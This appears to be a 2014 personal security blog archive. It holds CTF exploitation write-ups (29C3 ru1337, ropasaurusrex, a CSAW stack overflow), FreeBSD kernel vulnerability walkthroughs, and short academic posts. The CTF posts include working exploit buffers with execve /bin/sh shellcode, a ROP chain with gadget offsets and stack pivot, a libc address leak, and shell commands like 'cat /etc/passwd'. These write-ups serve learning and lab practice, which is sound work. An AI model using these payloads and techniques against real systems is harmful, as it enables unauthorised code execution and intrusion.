Thursday, 20 November 2014

What's a proof good for?

Reading "Weird Machines" [1] a paragraph jumped out:
Following [2], we distinguish between formal proofs and the forms of mathematical reasoning de-facto communicated, discussed, and checked as proofs by the community of practicing mathematicians. The authors observe that a long string of formal deductions is nearly useless for establishing believability in a theorem, no matter how important, until it can be condensed, communicated, and verified by the mathematical community. The authors of [2] extended this community approach to validation of software—which, ironically, the hacker research community approaches rather closely in its modus operandi, as we will explain. 
It indicates that people don't care for proof as much as they should. More chillingly it highlights how much people are driven by emotion versus reason. So, [2] quickly jumped in priority of papers to read for me.

[1] Sergey Bratus, Michael E. Locasto, Meredith L. Patterson, Len Sassaman, and Anna Shubina, "From Buffer Overflows to "Weird Machines" and Theory of Computation,"

[2] Richard A. DeMillo, Richard J. Lipton, and Alan J. Perlis, “Social Processes and Proofs of Theorems and Programs,” technical report, Georgia Institute of Technology, Yale University, 1982:

Saturday, 23 August 2014

29C3 ru1337

Let's look at another CTF challenge. This one is from the 29C3 CTF exploitation ru1337. Unlike other challenges, this one does not look like it represents a real world scenario but rather a creative puzzle.

The code is quite small. It has the basic accept - fork pattern at the beginning and runs this function:

What stands out is the call eax instruction. It looks like the code actually executes some memory from the data segment. Let's try to find out what that memory is because the call is slightly unusual. We go to analyze the first function call within this routine - sub_80487E1.

In the function we notice a call to mmap to allocate the strange memory buffer:

There are several interesting things about this call. First, it requests the location to be at 0x0BADC0DE. Second, the permissions are set to READ|WRITE but not EXECUTE. This is interesting because just above we see this mmapped buffer being executed. Fear not, the signal handler will catch the error.

Next we see that the user sends in a user name into a buffer on the stack. The recv call is requested to read 44 bytes from the socket:

The peculiar thing is that the sub instruction places the destination buffer at ebp-18h which is only 8 bytes away from the next thing on the buffer. The portion of the stack looks like this:

So, we are going to go ahead and overwrite that base pointer and return address with a buffer that is bigger than 24 bytes long. There are, however, some trivial restrictions on what our username input can be. The reader should follow to address 0x080488C8 in the binary. It will show that the username is checked to contain ASCII alpha characters and NULL or NL characters. So, to get around that we will simply provide capital letters to the username.

Next, the function will request a password which is also written on the stack at ebp-94h the 's' variable:

The 's' buffer is actually 128 bytes long and the recv call reads 128 bytes. So, there is no overflow here. However, the following statements will write to the previously mmapped buffer (dest buffer). They will use strcpy to copy both the username and the password to the dest buffer. The password will be offset by 8 bytes presumably because the username is expected to be at most 8 bytes long. For this reason we will need to make sure that first 8 bytes of the username are actually executable, but not too damaging, code.

To recap, we've seen that we can overwrite the return address, much of the stack and we can control the contents of 0x0BADC0DE. However, 0x0BADC0DE is no executable but we'd like it to be!

We notice that the binary imports the mprotect function which can change permissions on memory pages:

We shall implement the classic return-to-libc style attack. The return address of our bad function is set to 0x08048580 with 0x0BADC0DE for first parameter, 0x400 (arbitrary, really) for the length and 4 for RWX permission set. Then to run our shell code we set the return address to 0x0BADC0DE again which will let us exec a shell. The exploit code looks like this:

  buf += 'PPPP'
  buf += "PPPPAAADAAAEAAA\x00"
  buf += uint(0x0BADC000) # EBP
  buf += uint(0x08048580) # EIP
  buf += uint(0x0BADC000) # return EIP
  buf += uint(0x0BADC000) # mprotect return address
  buf += uint(0x400)
  buf += uint(0x00000004)
  buf += "AAAF"
  buf += "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f"
  buf += "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
  buf += "A"*110

  sys.stdout.write( buf )
  sys.stdout.write( ";\nls;cat flag\n" )

We just netcat that to the listener and read the flag. Simples! The reason we can use the exec /bin/sh shellcode is because the function we exploited conveniently dup2's STDIN/OUT to the socket.

Thursday, 5 June 2014


Return Oriented Programming (ROP) is all the rage! Well almost, but it is needed when you can control the stack but not be able to execute from it i.e. with ASLR and NX. In this post I present my solution to ropasaurusrex which leveraged ROP. First the overflow:

It really doesn't get easier than this. There is a buffer on the stack which is much less than 256 bytes size and there is a read into that buffer of 256 bytes. We overwrite the return address and set the EIP free. That leave instruction in the epilog means that we can't just find a 'jmp esp' somewhere and easily use it. Also, I wanted to practice my ROP skills so I didn't consider any other exploitation vectors. So, we are going to build a ROP stack.

Aside from our binary there are two loaded modules:
(gdb) info sharedlibrary  
From        To          Syms Read   Shared Object Library 
0xf7e2f420  0xf7f5e6ee  Yes (*)     /lib32/ 
0xf7fdc860  0xf7ff47ac  Yes (*)     /lib/
I will be using libc for finding my gadgets. What are gadgets? Using ROP is like lining up dominoes and then letting them fall in some path. The only difference is that in ROP we might actually be able to make decisions because we can point to conditional instructions. In this case gadgets are the domino pieces that we line up by placing their addresses on the stack. The addresses are 'return' addresses pointing to the next gadget as if the next gadget has actually called the previous. Probably a convoluted explanation but it will make sense soon.

Imagine you have the following C code:
int a = 0; 
void A() { a++; return; } 
void B() { A(); a += 2; return; } 
void C() { B(); a += 3; return; }
That, in essence represents what a ROP chain is --- a list of gadgets. Starting with function C, by the time function A is invoked the stack will contain return addresses back to functions C and B in order. The actual useful 'work' parts are the increments of the variable 'a'. For this to be a proper ROP chain we will logically take out all the call instructions to any of the function and just pretend that they happened. Then we will point EIP to the 'a++' statement and let the code run. We want to do that because we want function A to do it's operation first. When A returns, it will return 'back' to B executing 'a += 2' and so on.

With this logic we can set up a theoretically arbitrary control flow. ROP has been shown to be turing complete [1] although in practice that might be tougher to achieve. There is also a similar method called Jump Oriented Programming [2] (JOP) which uses a dispatch address table and jump instructions to control flow of execution. It is similar to how C-style switch statements operate.

Back to our code. The EIP is trivially controlled, so let's talk about what we will do with it. To practice ROP I have disabled ASLR on my Virtual Machine by writing 0 to /proc/sys/kernel/randomize_va_space. Will be looking at leaking next time. This allows me to make assumptions about where my libc module is loaded at the time of exploitation.

The target application reads/writes on the standard IO. This means that I will be feeding the exploit through a pipe on the command line. So to get the ropasaurus to execute my commands I will have it execv a shell and then have access to any sort of shell commands. For this we will need the execv shellcode... but in ROP form.

We will use the execv system call via interrupt 0x80. So, somehow, we need to set up the registers as follows. Remember linux system calls expect parameters to be passed via registers.

    EAX = 0xB              // System call number
    EBX = PTR to "/bin/sh" // File to execute
    ECX = NULL             // Program arguments
    EDX = NULL             // Program environment

Once the registers are set up we call interrupt 0x80 and the kernel takes care of the rest. I like this method because there is no need to do any clean up. The only thing we should be aware of is that the shell will start reading STDIN looking for commands. This happens after ropasaurus has read 256 bytes. So our exploit buffer needs to contain the shell commands after 256 bytes (i.e. cat /etc/passwd).

At the minimum we want to replicate the functionality of this code:

(Courtesy of the Online Disassember)

We do this by finding gadgets in the libc image. Using an online tool, ropshell, I was able to generate searchable list of all possible gadgets. Basically those are all sets of possible instructions that end with a return or a jump instruction.

So we put together a "shellcode" sequence that looks like this. Think of it as the sequence pointers to instructions to be executed not the actual instruction byte codes sent to the program. At the beginning I notice that ECX has the pointer to our buffer. So I need to pivot the stack and have ESP point to it. We point the EIP to the first instruction:

    pop edx      'preparing for the next jmp.
    mov esp, ecx 'stack pivot
    jmp edx      
    pop ecx      'now at the beginning
    pop eax      '[pop #1]

This sequence allows us to "wrap" around ESP to the beginning of our buffer which gives us more space to play. Considering how the overflow worked this might not have been entirely necessary as there would probably be enough space to write the rest of the ROP chain. But it's done now.

In each case ret and jmp instructions are set up such that they point to the the next instruction to execute. In reality the EIP is jumping all around the libc text section. Next, we set up the registers to prepare for the system call.

    push esp
    pop ebx       'point near /bin/sh
    pop esi
    add ebx, eax  '[pop #1] adjusts ebx
    add eax, 2
    pop edx       'program environment
    add al, -0x17 'set EAX to 0xB
    int 0x80

Done. Once this sequence executes we will have the shell. Notice that it is very not straight forward as compared to the nice, no hacking, solution. Here we use EAX to adjust the EBX pointer before it is fixed up to be the system call number. The stack buffer is built up using the this python code:

buf += uint(0)            # the ecx for g2
buf += uint( (0xB + 0x17 - 2) ) # the eax for g2
buf += gadget(0x0010D251) # ret of g2 going to g3:
buf += 'AAAA'             # value for esi of g3
buf += gadget(0x00143242) # g4: add ebx, eax; add eax, 2; ret
buf += gadget(0x0002E3CC) # g7: pop edx; ret
buf += uint(0)            # value of edx for g7
buf += gadget(0x0010A44D) # g6: add al, -0x17, ret
buf += gadget(0x000EA621) # g5: int 0x80
buf += '/bin'
buf += '/sh\x00'
buf += "/bin/bash\x00"

buf = padwith(buf, 0x100-4*29)

# return address (initial EIP)
buf += gadget(0x0002E3CC) # g0: pop edx; ret

buf += gadget(0x000EE100) # value of edx for gadget 0
buf += gadget(0x0002E49D) # g1: mov esp, ecx; jmp edx

buf = padwith(buf, 0x100) # make exactly 256 bytes

The addresses are the values given by the ROPShell tool but the python code outputs the corrected offsets using the base address of libc. Once executed we can feed any sort of shells commands that we want:


Update: I couldn't just let this one go without a full exploit. I've spent a little bit more time and developed a mechanism to leak out an address of a function within libc which gave me a chance to calculate the base address of the libc module.

The exploit will working like this. First we send in 256 bytes to leak out an address, then we send 256 bytes to execute a shell. It's a two stage exploit which also means that the it becomes interactive.

First, we notice that the binary was compiled without RELRO which means that the GOT PLT will be at a known address. The PLT contains dynamically generated addresses to library functions. There is a good write up of how it works on the ISISBlogs. So, we need to figure out a way to get those addresses.

The way I've done it is to point the initial return address to the write function in the PLT entry and on the stack I've put in the parameters for the write call. Essentially I simulate the call to write once the function containing a read returns. This write will send back 0x1C bytes of the PLT - the entire table. On the same stack I put in the address of the main function, so that I could start the process again allowing me another shot at the bug knowing the location of the write function. At this point, see the beginning of the blog.

The code for the leak looks like this:

   buf = padwith(buf, 0x100-4*29)

   # return address (initial EIP)
   buf += addr(0x08048312) # point to write@plt
   buf += addr(0x0804841D) # return main 
   buf += uint(1)          # STDOUT
   buf += uint(0x08049614) # point to the plt for write
   buf += uint(0x1c)       # write buffer size

   buf = padwith(buf, 0x100) 

Works every time.


[1] E. Buchanan, R. Roemer, H. Shacham, and S. Savage. When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC. In 15th ACM CCS, pages 27–38, New
York, NY, USA, 2008. ACM.

[2] T. Bletsch, X. Jiang, V. Freeh and Z. Liang. Jump-Oriented Programming: A New Class of Code-Reuse Attack. ASIACCS ’11, March 22–24, 2011, Hong Kong, China.

Thursday, 22 May 2014

The winter of 2014 was cold.

During the months of January and February of the year 2014 I gave an objective to myself. It was to finish the masters dissertation to the point of submission. I also learned that picking a hard topic was probably not the best idea but it was certainly rewarding. Nonetheless, I still received a distinction (the Oxford version of an A) for the work. So, I'm happy share it with the world welcoming any sort of feedback.

If you're interested you can read the full paper here: The full paper

Personal computing devices and servers are becoming more powerful by the day through hardware parallelisation. Such advances require developers to look into concurrency in order to take advantage of the new computing power. However, much of the code is written without formal verification and checked only heuristically through unit or other tests. This dissertation will show how Communicating Sequential Processes (CSP) can be used to detect errors in an application that supports concurrent execution. This is done by isolating common concurrency problems and mapping them into CSP representations. Finally, Failures-Divergences Refinement (FDR) software package is used to perform refinement checks to detect the errors in the source code. This process allows the developer to build assertions that their code must pass to prove its correctness. 

I would like to thank my advisor, Dr. Andrew Simpson, and the Software Engineering Program staff for their guidance and quick responses. This project could not have been accomplished without the generosity, patience and accommodation of the family scholarship fund. I am particularly grateful to the American people for providing the opportunity and the Lithuanian people for their infinitely delicious food and heavenly honey. Finally, I wish to thank my wife, Diana, for her love, support and conversation. 

Wednesday, 21 May 2014

A simple one

CTF challenges can be great fun. One evening had a few minutes and decides to work a simple one from CSAW. It can be downloaded from Here's the break down:

A server listens on a TCP socket port 31338. It forks on a connection creating a new process for each client. The server send sends some data and reads some data into a buffer. At that point the handling function either calls exit or returns. The last part is interesting because on return the exploit can succeed and gain execution. If the exploit fails to set up the stack correctly, the process will exit without gaining execution.

This challenge is a good starter, although I would not expect this sort of a situation to come up anymore. Perhaps in old or deliberately bad software. This situation was more common in the 90's. The use in the exercise is to go through the motions of learning how stack corruption vulnerabilities work.

First, a connection comes in. The server forks to create a new process:

The handle function is called with the client socket file descriptor as the first parameter. Here we see a modern compiler convention to place the parameters on the stack using a mov instruction. Older compilers usually use the push instruction. The end result is the same because at the time of the call the first thing on the stack (i.e. [esp]) is the first parameter. This fits the calling convention used by the called function.

The handle function has several things in its stack frame: buffer, some byte variable, 32bit integer:

We see that the buffer is of size 2047 bytes due to it's large offset. Specifically, it is the distance between the buffer and the next variable. 0x80C - 0xD which is 2060 - 13 = 2047. I called the next variable 'zero' because that is the value that will be assigned to it after the overflow happens. The cookie actually simulates a stack canary implemented early on by compilers to protect against stack based buffer over flows. We'll see later how that can be over come for this challenge.

The cookie will contain a random value seeded off of the time that the handle function runs. At first glance I was thinking that we would have to try to guess it based on the approximate time of the server. But it gets better. Here we can see the assignment:

We can also see that the cookie is being saved of to a location in the data segment called secret. Later, that is how the function will know if the cookie has been corrupted.

Let's look at the next interesting chunk of code:

There are two calls to the send function. First one loads the address of the buffer as the parameter which actually sends the stack location of the buffer. Second send loads up the cookie and sends that to the client. So we really have all information we need. This would also explain the funny characters we get upon connection to the server.

Finally, the overflow occurs when the receive function is called. That is because it reads 4096 bytes into a 2047 byte buffer. 

After the receive, the zero variable is assigned with zero value (just one byte). This is here just to make things slightly harder for you. Next the cookie is checked against the secret value. If the value matches then the function jumps away to return. The return is what will trigger the exploit and give us the code execution. If the value do not, then the code falls through and executes exit.

So the stacks looks like this: 
(low addr)
 [ 2047 bytes ] | [ zero byte] | [cookie] | [ few registers ] | [return addr] | [ socket]
(high addr)

This means that we need to write to the socket a value large enough to overwrite the return address which will become the EIP when the retn instruction is executed. So the actual exploit looks like this:

This code will read from the socket the address of the buffer and the cookie which will allow us to put those values into the exploit string.

Simple! Right? Well, not if you've never done this before.

Saturday, 25 January 2014


About the same time as the pipe vulnerability there was a devfs race condition discovered. This vulnerability manifested itself by an uninitialized vnode pointer being used. The pointer would be NULL and could be used by another process before it is assigned to an actual vnode. The vulnerability doesn't have a specific "place" in the code because it results due to the product of how devfs and vfs interact. However, the fix was made in devfs.

The bug turned out to be exploitable with the exploit nicely described by XORL blog post. I will be going into a little more detail about the code paths leading to the vulnerability.

First a process tries to open a devfs file (i.e. /dev/null or similiar). This is done through the open system call which eventually executes kern_open kernel function.

kern_open(struct thread *td, char *path, enum uio_seg pathseg, int flags, int mode)
/* An extra reference on `nfp' has been held for us by falloc(). */
fp = nfp;
cmode = ((mode &~ fdp->fd_cmask) & ALLPERMS) &~ S_ISTXT;
NDINIT(&nd, LOOKUP, FOLLOW, pathseg, path, td);
td->td_dupfd = -1; /* XXX check for fdopen */
error = vn_open(&nd, &flags, cmode, indx);
Almost at the very beginning the call goes down the path of vn_open which executes the VFS specific functionalities. vn_open performs many checks, such as does the user have access to the file or are the access flags correct? It eventually passes control to the devfs subsystem for the actual device opening:

vn_open_cred(ndp, flagp, cmode, cred, fdidx)
struct nameidata *ndp;
int *flagp, cmode;
struct ucred *cred;
int fdidx;
vfslocked = 0;
fmode = *flagp;
ndp->ni_cnd.cn_nameiop = LOOKUP;
ndp->ni_cnd.cn_flags = ISOPEN |
   ((fmode & O_NOFOLLOW) ? NOFOLLOW : FOLLOW) |
if ((error = namei(ndp)) != 0)
return (error);
ndp->ni_cnd.cn_flags &= ~MPSAFE;
vfslocked = (ndp->ni_cnd.cn_flags & GIANTHELD) != 0;
vp = ndp->ni_vp;
if ((error = VOP_OPEN(vp, fmode, cred, td, fdidx)) != 0)
goto bad;
if (fmode & FWRITE)
*flagp = fmode;
ASSERT_VOP_LOCKED(vp, "vn_open_cred");
if (fdidx == -1)
return (0);
*flagp = fmode;
ndp->ni_vp = NULL;
return (error);
Here the call is passed through to devfs via the VOP_OPEN marco call.
static int
devfs_open(struct vop_open_args *ap)
dsw = dev_refthread(dev);
if (dsw == NULL)
return (ENXIO);
/* XXX: Special casing of ttys for deadfs.  Probably redundant. */
if (dsw->d_flags & D_TTY)
vp->v_vflag |= VV_ISTTY;
VOP_UNLOCK(vp, 0, td);
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY, td);
fp = ap->a_td->td_proc->p_fd->fd_ofiles[ap->a_fdidx];
KASSERT(fp->f_ops == &badfileops,
    ("Could not vnode bypass device on fdops %p", fp->f_ops));
fp->f_ops = &devfs_ops_f;
fp->f_data = dev;
return (error);
So far so good, nothing terribly bad has happened, there is no memory corruption. However, the problem is that right after the VOP_UNLOCK(vp, 0, td) call another thread can start using the file descriptor. If the second thread does not check the vnode pointer then it would be in trouble. At this point the kernel has not assigned the vnode to the file descriptor (fp) structure.

This assignment happens later in the kern_open call in the same execution thread. In fact, it happens just before the function returns to the user land.
kern_open(struct thread *td, char *path, enum uio_seg pathseg, int flags,
    int mode)
if (fp->f_count == 1) {
mp = vp->v_mount;
KASSERT(fdp->fd_ofiles[indx] != fp,
   ("Open file descriptor lost all refs"));
VOP_UNLOCK(vp, 0, td);
vn_close(vp, flags & FMASK, fp->f_cred, td);
fdrop(fp, td);
td->td_retval[0] = indx;
return (0);
fp->f_vnode = vp;
if (fp->f_data == NULL)
fp->f_data = vp;
fp->f_flag = flags & FMASK;
if (fp->f_ops == &badfileops)
fp->f_ops = &vnops;
fp->f_seqcount = 1;
fp->f_type = (vp->v_type == VFIFO ? DTYPE_FIFO : DTYPE_VNODE);
The assignment marked above is where it happens. As mentioned before, it is too late by that time and there is a danger that the pointer could be used. That is exactly what happened in the exploit code. The fix was to go back to the devfs_open call, break the abstraction, and assign the vnode to the file descriptor right after the unlock happens.

Saturday, 18 January 2014


Code seems to age much quicker that anything else. Way back - not so long ago - in 2009 there was a bug in the FreeBSD kernel PIPE and EVENT handling code. This turned out to be exploitable in versions 6.x of the kernel. It was never truly patched, however the code was redesigned in order to eliminate a whole set of potential vulnerabilities including this one. The bug was published by the FreeBSD security advisory FreeBSD-SA-09:13.pipe.asc. A proof of concept exploit is available for this vulnerability:

For this analysis I needed to figure out what sequences of events lead to the vulnerability manifestation. I won't go into details about how the corruption happened and how the exploit works. Also, I haven't actually tried to execute it - so, I'm merely assuming that it works.

Unless you know the details of how kqueues, knote lists and pipes work, this vulnerability is actually quite hard to spot even if the patch is available. The patch covers a lot of code and does not highlight the bug itself. So, if for some strange reason you're trying to figure out this vulnerability then this post should give you the initial steps.

The vulnerable version of the kernel is still available in the current (as of this writing) FreeBSD SVN: All analysis below follows that code.

We start with function pipe_close which gets called via the close system call.
static int
pipe_close(fp, td)
    struct file *fp;
    struct thread *td;
    struct pipe *cpipe = fp->f_data;

    fp->f_ops = &badfileops;
    fp->f_data = NULL;
    return (0);
This function obtains the pipe structure and sends it on to the pipeclose function. It is important to note that a pipe has two parts. The read and write, however it is one entity. The pipe pair is allocated in the same UMA (Upper Memory Area) zone as one chunk of memory. So, really the read/write pipes refer to the same general space.

Pipeclose then obtains the pair and tries to flush the pipe and clear out any knotes attached to it. A knote is a special mechanism used for kernel to user event notification. In very basic terms it is a select optimized for a special case. In select the user has to pass a whole list of identifiers to the kernel while with a knote a user subscribes to a filter (the event criteria) and allows for a much more granular event notification. The user process maintains a kqueue of the events it is listening on while each identifier being listened on maintains a knote linked list to know who to notify. A much more detailed description of this mechanism can be found in this paper: kqueue.pdf.

Once various closing/flushing processes are complete the pipeclose function tries to clear out the pipe by starting with the knote list. About half way down the list, the following sequence is executed:
static void
      struct pipe *cpipe;
      struct pipepair *pp;
      struct pipe *ppipe;
      cpipe->pipe_present = 0;
      knlist_clear(&cpipe->pipe_sel.si_note, 1);

Can you spot the bug? The above code is basically it. I wouldn't expect you to, unless you're a kernel hacker for this particular portion of the kernel. Specifically, the last two lines in the above listing cause the problem.

  • The PIPE_LOCK mutex isn't protecting the pipe, it is protecting the pipelock mutex.
  • The pipe is UNLOCKED by the pipeunlock call before calls to knlist_clear and knlist_destroy are made.
This means that two processes can be calling knlist_clear and knlist_destroy unsafely. Both of those functions are not thread safe. So, it can happen that a linked list of knotes for the pipe is reinitialized (via the destroy call) while it is still being cleared. The clearing is a blocking procedure that sends out notifications to processes on the knote list. While the clearing function is traversing the same linked list it could easily be destroyed by another process because that process sees an already cleared list.

Thursday, 9 January 2014


Older FreeBSD 7 and 8 versions had a bug in the pseudofs module - back in 2010. This bug manifested through an unnecessary mutex release which turned out to be exploitable through a NULL pointer dereference. In this post I will do a walk through to show the events that lead up to the bug. For more information check out the security advisory: FreeBSD-SA-10:09.pseudofs.asc. There is also a proof of concept exploit available on Security Focus.

The chain starts with a call to extattr_get_link in kern/vfs_extattr.c
ssize_t extattr_get_link(const char *path, int attrnamespace,
const char *attrname, void *data, size_t nbytes);
Which obtains extended attributes from a vnode. The functions looks like this
int extattr_get_link(td, uap)
struct thread *td;
struct extattr_get_link_args /* {
const char *path;
int attrnamespace;
const char *attrname;
void *data;
size_t nbytes;
} */ *uap;
vfslocked = NDHASGIANT(&nd);
error = extattr_get_vp(nd.ni_vp, uap->attrnamespace, attrname,
   uap->data, uap->nbytes, td);
return (error);
The important part being selected, we see a call to extattr_get_vp. This was essentially a wrapper adding a few bells and whistles to the process.
static int
extattr_get_vp(struct vnode *vp, int attrnamespace, const char *attrname,
    void *data, size_t nbytes, struct thread *td)
struct uio auio, *auiop;
struct iovec aiov;
ssize_t cnt;
size_t size, *sizep;
int error;
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
error = VOP_GETEXTATTR(vp, attrnamespace, attrname, auiop, sizep,
   td->td_ucred, td);
if (auiop != NULL) {
cnt -= auio.uio_resid;
td->td_retval[0] = cnt;
} else
td->td_retval[0] = size;
VOP_UNLOCK(vp, 0);
return (error);
We are starting to see a few statements directly relating to the vulnerability. First there is the vn_lock
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
which takes in the vnode pointer that we are interested in. This is the call that locks the vnode and the mutex in question. The code for that is slightly convoluted. Instead of using mtx_lock,  it works by invoking the lock manager.
// in kern/vfs_vnops.c
#define vn_lock(vp, flags) _vn_lock(vp, flags, __FILE__, __LINE__)
_vn_lock(struct vnode *vp, int flags, char *file, int line)
int error;
VNASSERT((flags & LK_TYPE_MASK) != 0, vp,
   ("vn_lock called with no locktype."));
do {
error = VOP_LOCK1(vp, flags, file, line);            
flags &= ~LK_INTERLOCK; /* Interlock is always dropped. */
} while (flags & LK_RETRY && error != 0);
return (error);
The function passes control to the VOP_LOCK1 marco. Here the control goes into the custom psuedofs territory. The module, however, does not implement the lock function and so a default locking function is used.
// kern/vfs_default.c
struct vop_lock1_args /* {
struct vnode *a_vp;
int a_flags;
char *file;
int line;
} */ *ap;
struct vnode *vp = ap->a_vp;
return (_lockmgr_args(vp->v_vnlock, ap->a_flags, VI_MTX(vp),
Here we see that the default implementation passes the lock, vp->v_vnlock, to the lock manager via the _lockmgr_args function - a function too complex to show here and unnecessary for my purposes. The mutex is officially locked. Going back to extattr_get_vp we see a call to VOP_GETEXTATTR
error = VOP_GETEXTATTR(vp, attrnamespace, attrname, auiop, sizep,
    td->td_ucred, td);
This marco sends us to the module code where the actual extended attributes extraction occurs. The call resolves to pfs_getextattr function - through various function pointer magic. While essentially a wrapping function, akin to the Java synchronized block, this is where the bug lives.
static int
pfs_getextattr(struct vop_getextattr_args *va)
struct vnode *vn = va->a_vp;
struct pfs_vdata *pvd = vn->v_data;
struct pfs_node *pn = pvd->pvd_pn;
struct proc *proc;
int error;
PFS_TRACE(("%s", pn->pn_name));
* This is necessary because either process' privileges may
* have changed since the open() call.
if (!pfs_visible(curthread, pn, pvd->pvd_pid, &proc))
if (pn->pn_getextattr == NULL)
error = pn_getextattr(curthread, proc, pn,
   va->a_attrnamespace, va->a_name, va->a_uio,
   va->a_size, va->a_cred);
if (proc != NULL)
 pfs_unlock(pn); //<---- BUG
PFS_RETURN (error);
That  pfs_unlock call is the culprit. Taking in the same node we saw in the VOP_LOCK1 call we saw earlier, it unlocks the mutex for the node. In retrospect the bug seems obvious. Why would the developer think that it is ok to mess with a mutex that was modified on a much high abstraction layer. I'm sure there was a good reason at the time. Perhaps the code was refactored where this unlocking step no longer makes sense. Regardless, the line was here and it caused a vulnerability. pfs_unlock itself is a simple inline function defined in fs/pseudofs/pseudofs_internal.h
static inline voidpfs_unlock(struct pfs_node *pn){
Now for completeness, the other unlocking call happens back in extattr_get_vp  function through a call to a VOP function
static int
extattr_get_vp(struct vnode *vp, int attrnamespace, const char *attrname,
    void *data, size_t nbytes, struct thread *td)
VOP_UNLOCK(vp, 0);
return (error);
Again, psuedofs does not implement the unlocking function and uses a default implementation which uses the lock manager.

I've not gone into the details of how the actual corruption occurs and how it can be exploited. Perhaps another time. For my task I just needed to know the call chains that lead up to the bug. Hope you enjoyed reading it. An unpached version can be seen here: 8.3.0/sys/fs/pseudofs/pseudofs_vnops.c